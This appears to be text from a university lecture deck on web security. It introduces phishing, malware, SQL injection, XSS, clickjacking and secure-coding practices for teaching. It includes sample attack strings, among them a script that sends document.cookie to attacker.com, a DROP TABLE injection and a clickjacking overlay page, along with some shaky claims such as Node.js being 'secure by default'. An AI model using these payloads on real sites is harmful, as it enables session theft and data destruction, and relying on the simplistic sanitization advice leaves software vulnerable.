Web design

Lecture #16. Web Security

The organization issues

Use this link to confirm your attendance in the lecture

Лабораторна робота №1

Лабораторна робота №2

Лабораторна робота №3

Контрольна робота №4 - сьогодні

2
Introduction to Web Security
Importance of web security: With the increasing reliance on the internet for
various activities, web security has become more critical than ever. Security
breaches can cause significant financial losses, damage to reputation, and loss of
user trust.
Definition of web security: Web security refers to the measures taken to
protect websites, web applications, and web servers from unauthorized access,
attacks, and exploitation of vulnerabilities.
These measures can include using strong passwords, implementing
authentication and authorization mechanisms, encrypting data, installing firewalls,
using security plugins and tools, regularly performing security audits and testing,
and more.
Threats
Web security threats are constantly evolving, and it's important to stay informed
about the most common threats to keep your website secure. Here are some of
the most prevalent web security threats:
Phishing: Phishing attacks involve sending fake emails or creating fake websites
to trick users into providing sensitive information such as passwords, credit card
numbers, or social security numbers.
Malware: Malware is a type of software designed to harm a computer or network.
Malware can include viruses, worms, and Trojan horses, among others.
SQL Injection: SQL injection attacks exploit vulnerabilities in web applications to
inject malicious SQL code into the application's database, allowing attackers to
gain access to sensitive information.
Cross-Site Scripting (XSS): XSS attacks involve injecting malicious code into a
website to steal user data or redirect users to a fake website.
Distributed Denial of Service (DDoS): DDoS attacks involve overwhelming a
website with traffic, making it unavailable to users.
 Phishing
Phishing is a type of cyber attack that involves tricking individuals into providing sensitive
information such as usernames, passwords, and credit card numbers.. Attackers often use
social engineering techniques to convince the victim to click on a link or download an
attachment to steal their information.
Here are some examples of phishing:
Email Phishing: An attacker sends an email that appears to be from a trusted source, such as
a bank or an online retailer, asking the recipient to click on a link and enter their login
credentials. The link takes the victim to a fake website that looks legitimate but is designed to
steal their information.
Spear (“спис”) Phishing: This type of phishing is targeted at a specific individual or
organization. The attacker gathers information about the victim, such as their job title and
work history, to make the phishing attempt appear more credible.
Smishing: This type of phishing is conducted through SMS or text messages. The attacker
sends a message that appears to be from a legitimate source, such as a bank, asking the
recipient to click on a link or provide their login credentials.
Social Media Phishing: Attackers create fake social media accounts or impersonate
legitimate accounts to trick users into clicking on a link or downloading an attachment.
Phishing attacks can be difficult to detect because they often use sophisticated tactics to make
Phishing example
<h1> Login </h1>
<form action="https://www.example.com/login.php"
method="post">
<label for="username">Username:</label>
<input type="text" id="username"
name="username" placeholder="Enter username">

<label for="password">Password:</label>
<input type="password" id="password"
name="password" placeholder="Enter password">

<input type="submit" value="Login">

</form>
Malware
Malware is a type of software designed to harm a computer or network
Virus: A computer virus is a type of malware that can replicate itself and spread
from one computer to another. It can corrupt or delete files, steal data, or even
cause hardware damage.
Trojan Horse: A Trojan horse is a type of malware that disguises itself as a
legitimate program or file to trick users into downloading it. Once it's installed, the
Trojan can perform a variety of malicious actions, such as stealing sensitive
information or giving an attacker remote access to the infected computer.
Ransomware (викуп): Ransomware is a type of malware that encrypts a user's
files and demands a ransom payment in exchange for the decryption key. It can be
spread through email attachments, infected websites, or malicious downloads.
Adware: Adware is a type of malware that displays unwanted advertisements or
pop-ups on a user's computer. It can be bundled with legitimate software
downloads or installed without the user's knowledge.
Spyware: Spyware is a type of malware that can track a user's activity on their
computer or network. It can be used to steal sensitive information such as
passwords, credit card numbers, or browsing history.
SQL Injection
SQL injection is a type of attack that takes advantage of vulnerabilities in web
applications that interact with a database. The goal of a SQL injection attack is
to inject malicious code into a website's SQL statements, which can then be used
to steal sensitive data or take control of the website.
Here is an example of how a SQL injection attack might work:
Let's say that a website has a search box where users can search for products. The
search box takes the user's input and passes it along to the database as part of an
SQL query. The SQL query might look something like this:
SELECT * FROM products WHERE name = 'search_term';
However, if an attacker enters malicious code into the search box, the SQL query
might look something like this:
SELECT * FROM products WHERE name = 'search_term'; DROP TABLE users;
Another example of a SQL injection attack is using a login form.
// User input passed directly into a database query
SELECT * FROM users WHERE username=' + user_input + ' AND
password=' + password;
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) is a web security vulnerability that allows attackers to
inject malicious code into a website that is viewed by other users. This
code can be used to steal user data or redirect users to a fake website. XSS
attacks are typically carried out by exploiting vulnerabilities in a website's input
validation or output encoding.
Types of XSS:
Reflected XSS: Reflected XSS attacks occur when an attacker injects malicious
code into a website that is immediately returned to the user as part of the
response. This can occur when a website fails to properly validate user input.
Stored XSS: Stored XSS attacks occur when an attacker injects malicious code
into a website that is stored on the server and displayed to users at a later time.
This can occur when a website allows users to submit content that is not properly
sanitized.
DOM-Based XSS: DOM-based XSS attacks occur when the attacker is able to
manipulate the Document Object Model (DOM) of a website, leading to the
execution of malicious code. This can occur when a website uses JavaScript to
process user input.
XSS Examples
Malicious script injected into a web page
<script>
fetch("http://attacker.com/log?key=" + document.cookie);
</script>
Example of a Reflected XSS Attack:
Suppose there is a search field on a website that allows users to search for
products. The website takes the search term input by the user and displays the
search results on the same page. An attacker can insert malicious code in the
search term, which gets executed when the search results are displayed.
https://example.com/search?q=<script>alert('XSS attack!')</script>
Clickjacking
Clickjacking is a type of attack where a website is disguised to trick users into
clicking on something they didn't intend to click. The attacker hides a malicious
element, such as a button or link, behind a legitimate-looking element, such as an
image or a piece of text.
Clickjacking can be used to steal sensitive information, install malware, or perform
other malicious actions.
Examples of clickjacking attacks include:
Likejacking: The attacker tricks the user into clicking on a hidden Facebook "Like"
button, which causes them to unknowingly "like" a malicious page or post.
UI redressing: The attacker uses CSS and other techniques to make a fake login
form appear over a legitimate website's login form. When the user enters their
login credentials, they are sent to the attacker's server instead of the legitimate
server.
Download hijacking: The attacker uses JavaScript to make a fake download
button appear over a legitimate download button. When the user clicks on the
fake button, they unknowingly download malware instead of the legitimate file.
Cookie stealing: The attacker uses JavaScript to make a fake login form appear
over a legitimate website's login form. When the user enters their login
Clickjacking Example
<html>
<head>
<title>Clickjacking Example</title>
</head>
<body>
<iframe src="https://example.com" width="100%"
height="100%"></iframe>
<div style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; z-
index: 999;"></div>
<div style="position: absolute; top: 50%; left: 50%; transform: translate(-50%, -
50%); z-index: 1000;">
<h1>Login to Example.com</h1>
<form action="https://example.com/login" method="POST">
<label for="username">Username:</label>
<input type="text" id="username" name="username">
<br>
<label for="password">Password:</label>
Best practices for web application
security
Input validation and sanitization: Validate and sanitize all user input on both
the client and server side to prevent malicious input from being executed.
Secure coding practices: Follow secure coding guidelines, use safe
programming languages, and avoid known vulnerabilities.
Session management: Use secure session management techniques, such as
using a unique session ID for each user session, using a secure session storage
mechanism, and using SSL/TLS to encrypt session data.
Authentication and access control: Implement strong authentication
mechanisms, such as multi-factor authentication and password complexity rules,
and use role-based access control to restrict access to sensitive data.
Least privilege: Follow the principle of least privilege, granting users only the
minimum level of access they need to perform their tasks.
Best practices for web application
security (2)
Error handling and logging: Implement proper error handling and logging
mechanisms to prevent information leakage and to help identify security issues.
Secure communication: Use SSL/TLS to encrypt communication between the
client and server and to protect sensitive data in transit.
Regular updates and patches: Keep web applications and server software up-
to-date with the latest patches and updates to address known security
vulnerabilities.
Regular security assessments: Perform regular security assessments, such as
penetration testing and vulnerability scanning, to identify and remediate security
weaknesses.
Training and awareness: Train developers and users on secure coding practices
and awareness of security threats and vulnerabilities.
Input validation and sanitization
Input validation and sanitization are techniques used to ensure that user input is
safe and conforms to expected values.
Input validation is the process of checking that user input meets certain criteria,
such as being of a certain length, containing only certain characters, or
conforming to a certain format (e.g. email addresses).
Sanitization, on the other hand, is the process of cleaning up user input to
remove any potentially dangerous or unexpected characters or formatting. For
example, sanitization might involve removing any HTML tags or JavaScript code
from user input to prevent cross-site scripting attacks.
Input validation
Length Validation:

This type of validation is used to ensure that the user input does not exceed a
certain length or minimum length.

For example, if you are expecting a username input, you can set a validation rule
that the username should be between 6 to 20 characters long.

Data Type Validation:

This type of validation is used to ensure that the user input matches the expected
data type.

For example, if you are expecting a numerical input for age, you can set a
validation rule to only accept numbers and not alphabets.

Regular Expression Validation:

This type of validation is used to ensure that the user input matches a specific
pattern.
Input validation (2)
Range Validation:
This type of validation is used to ensure that the user input falls within a specific
range.
For example, if you are expecting a weight input, you can set a validation rule to
only accept weights between 30 and 150 pounds.
Mandatory Field Validation:
This type of validation is used to ensure that a mandatory field is not left blank or
empty.
For example, if you are expecting a password input, you can set a validation rule
to ensure that the password field is not empty.
Whitelist Validation:
This type of validation is used to ensure that the user input only contains specific
characters or values.
For example, if you are expecting an input for a URL, you can set a validation rule
to only accept alphabets, numbers, and certain special characters like "-" and ".".
Sanitization
Removing HTML tags: One common sanitization technique is to remove HTML
tags from user input. This can help prevent cross-site scripting (XSS) attacks by
preventing users from injecting malicious scripts into your web application. For
example, you can use the strip_tags() function in PHP to remove HTML tags from
user input.
Escaping special characters: Another common sanitization technique is to
escape special characters that have a special meaning in your programming
language or database. For example, in PHP you can use the
mysqli_real_escape_string() function to escape special characters before storing
user input in a database.
Filtering input: You can also filter user input to allow only certain types of
characters or patterns. For example, you can use regular expressions to filter out
characters that are not alphanumeric. This can help prevent SQL injection attacks
by ensuring that user input only contains safe characters.
Validating file uploads: When users upload files to your web application, you
should validate the file to ensure that it is safe and does not contain malicious
code. For example, you can check the file extension and content type to ensure
that it is a valid image, video, or document file.
Limiting input length: Limiting the length of user input can also help prevent
Removing HTML tags

function stripTags(input) {
return input.replace(/<[^>]+>/g, '');
}
// Example usage
let userInput = "<script>alert('XSS attack!');</script>";
let sanitizedInput = stripTags(userInput);
console.log(sanitizedInput); // Output: "alert('XSS attack!');"
Escaping special characters
function escapeSpecialChars(input) {
return encodeURIComponent(input);
}
// Example usage
let userInput = "<script>alert('XSS attack!');</script>";
let sanitizedInput = escapeSpecialChars(userInput);
console.log(sanitizedInput); // Output: "%3Cscript%3Ealert('XSS%20attack!')%3B
%3C/script%3E"
Filtering input

function filterInput(input) {
return input.replace(/[^a-zA-Z0-9]/g, '');
}
// Example usage
let userInput = "Hello! How are you?";
let filteredInput = filterInput(userInput);
console.log(filteredInput); // Output: "HelloHowareyou"
Secure coding practices
Secure coding practices are a set of guidelines and best practices that developers
should follow to reduce the risk of security vulnerabilities in their code. Here are
some examples of secure coding practices:
Input validation and sanitization: Validate all input data, whether it comes
from users or other sources, and sanitize it to prevent injection attacks.
Output encoding: Encode all output data to prevent cross-site scripting (XSS)
attacks.
Proper error handling: Implement proper error handling to avoid information
leakage and prevent security issues.
Password management: Store passwords in a secure way, such as using strong
encryption and salting techniques.
Access control: Use access control mechanisms to restrict access to sensitive
resources based on roles and permissions.
Secure coding practices
Session management: Implement secure session management techniques, such
as using random session IDs and setting session timeouts.
Avoiding buffer overflows: Use safe coding practices to avoid buffer overflows
and other memory-related vulnerabilities.
Cryptography: Use cryptography properly to protect sensitive data and
communications, and avoid common cryptographic pitfalls.
Secure coding guidelines: Follow secure coding guidelines, such as those
provided by OWASP and other organizations.
Security testing: Conduct security testing, such as penetration testing
(simulated attack on a system or application to identify security vulnerabilities)
and vulnerability scanning, to identify and address security vulnerabilities in the
code.
Session management
The purpose of session management is to ensure that user sessions are secure
and that sensitive data is protected from unauthorized access.
Session management techniques typically include the following:
Session ID generation: A unique session identifier is generated for each user
session to prevent session guessing and other attacks. The session ID is typically
stored in a cookie or URL parameter and is used to associate user requests with
their respective sessions.
Session timeout: Sessions should have a defined timeout period, after which the
user is automatically logged out. This prevents inactive sessions from being
hijacked by attackers.
Session encryption: Session data should be encrypted to protect it from
interception and tampering. This includes encrypting session IDs, session data,
and cookies that contain session information.
Session validation: Sessions should be validated on the server-side to ensure
that they are legitimate and have not been tampered with. This includes checking
session IDs, verifying user credentials, and monitoring session activity.
Authentication and access control

Here are some key concepts related to authentication and access control:
Authentication: Authentication is the process of verifying the identity of a user or
entity who is trying to access a website or web application. This process typically
involves the user providing a username and password, or using another form of
authentication such as biometrics or a security token.
Access control: Access control is the process of determining what resources or
actions a user is authorized to access on a website or web application. Access
control can be enforced at various levels, such as the web server, the application,
or individual pages or features within the application.
Authorization: Authorization is the process of granting or denying access to
specific resources or actions based on a user's identity and permissions.
Authorization typically involves assigning users to roles or groups, and then
granting or revoking access to those roles or groups.
Authentication and access control
(2)
Password policies: Password policies are a set of rules and requirements that
dictate how passwords should be created, managed, and stored. Examples of
password policies include requiring users to create strong passwords,
implementing password expiration policies, and enforcing password complexity
requirements.
Multi-factor authentication (MFA): Multi-factor authentication is a security
mechanism that requires users to provide two or more forms of authentication to
access a website or web application. Examples of MFA include requiring a
password and a security token, or requiring a fingerprint and a security question.
Single sign-on (SSO): Single sign-on is a mechanism that allows users to
authenticate once and then access multiple applications or websites without
having to re-enter their credentials. SSO can improve security by reducing the
number of passwords users need to remember and reducing the risk of password
reuse.
Role-based access control (RBAC): Role-based access control is a method of
access control that grants or revokes permissions based on the user's assigned
Best Practices for Securing a
Website
Password Policies: Implement strong password policies for all user accounts,
including minimum password length, complexity requirements, and regular
password changes.
Authentication and Authorization: Implement a secure authentication and
authorization system that includes multi-factor authentication, role-based access
controls, and session management.
Encryption: Implement encryption for all sensitive data, both at rest and in
transit. Use HTTPS protocol and SSL/TLS certificates to secure data in transit.
Firewall and Access Controls: Implement a firewall to prevent unauthorized
access to your website. Use access controls to restrict access to sensitive areas of
your website.
User Education: Educate your users about good security practices, such as
strong passwords, avoiding phishing emails, and reporting suspicious activity.
Best Practices for Securing a
Website (2)
Regular Security Audits and Testing: Conduct regular security audits and
testing to identify vulnerabilities and weaknesses in your website's security.
Keep Software Up-to-Date: Keep all software used on your website up-to-date
with the latest security patches and updates.
Use Security Plugins and Tools: Use security plugins and tools to enhance your
website's security, such as firewalls, anti-malware software, and vulnerability
scanners.
Implement Secure Coding Practices: Use secure coding practices when
developing your website, such as input validation, output encoding, error handling,
and secure password storage.
Regular Backups: Regularly backup your website to ensure that you can recover
your data in the event of a security breach or data loss.
Vue.js and security
Cross-site scripting (XSS) prevention: Vue.js includes built-in XSS prevention
mechanisms that can help prevent script injection attacks.
Content Security Policy (CSP): Vue.js applications can benefit from CSP, which
is a security feature that helps mitigate the impact of XSS and other types of
attacks.
Input validation: Developers can use Vue.js components and directives to
implement input validation and sanitization, which can help prevent malicious
input from being processed.
Secure communication: Vue.js can be used in conjunction with secure
communication protocols such as HTTPS to help protect data in transit.
Access controls: Developers can use Vue.js components and libraries to
implement access controls, such as user authentication and authorization, to limit
access to sensitive data and functionality.
Secure coding practices: Vue.js developers can follow secure coding practices
such as code reviews, error handling, and input validation to help prevent security
vulnerabilities.
NodeJS Security
Here are some of the key security features of Node.js:
Secure by default: Node.js is designed to be secure by default. It includes built-
in features such as sandboxing and strict mode that help prevent common security
vulnerabilities such as code injection, cross-site scripting (XSS), and cross-site
request forgery (CSRF).
TLS/SSL support: Node.js provides built-in support for Transport Layer Security
(TLS) and Secure Sockets Layer (SSL), which allow for secure communication over
the internet. This helps to protect sensitive data in transit and prevent man-in-the-
middle attacks.
Authentication and authorization: Node.js provides modules such as Passport
and JSON Web Tokens (JWT) for authentication and authorization. These modules
help to secure APIs and prevent unauthorized access to resources.
HTTP response headers: Node.js allows developers to set HTTP response
headers, which can help prevent certain types of attacks such as XSS and
clickjacking.
Static code analysis: Node.js has several tools such as ESLint and JSHint that